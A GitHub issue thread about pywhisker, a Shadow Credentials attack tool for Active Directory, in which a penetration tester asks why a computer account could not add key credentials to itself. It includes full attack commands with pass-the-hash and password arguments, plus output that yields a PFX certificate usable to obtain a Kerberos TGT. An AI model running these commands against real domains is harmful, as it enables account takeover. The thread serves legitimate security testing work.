search

ShutdownRepo / pywhisker

Python version of the C# tool for "Shadow Credentials" attacks
GNU General Public License v3.0
577 stars 65 forks source link

Computer accounts cannot edit their own msDS-KeyCredentialLink #12

Closed sva-tastaturlandwirt closed 10 months ago

sva-tastaturlandwirt commented 11 months ago

While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?

pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100   
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

However I was able to add shadow credentials as the domain admin:

pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

I also checked for any existing shadow credentials for the targeted computer account but there weren't any.

ShutdownRepo commented 11 months ago

Are you 100% positive the computer didn't have a KCL already?

sva-tastaturlandwirt commented 11 months ago

I wasn't able to see one when I checked as Domain Admin.

pywhisker -t 'vm-dc02$' -a list -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100 -vv
[DEBUG] Initializing domainDumper()
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
ShutdownRepo commented 11 months ago

Weird, I'm not aware of any change on Microsoft's end, but maybe they changed that 🤷 It'd be best to setup an up-to-date lab and test it there (I won't be able to do that for now)

sva-tastaturlandwirt commented 11 months ago

Alright, thank you. I'll try and setup a lab if time permits it. Let's hope it's not Microsoft that changed something but rather something particular about the specific AD environment.

ShutdownRepo commented 10 months ago

Closing. Please keep us updated if you find the answer 😉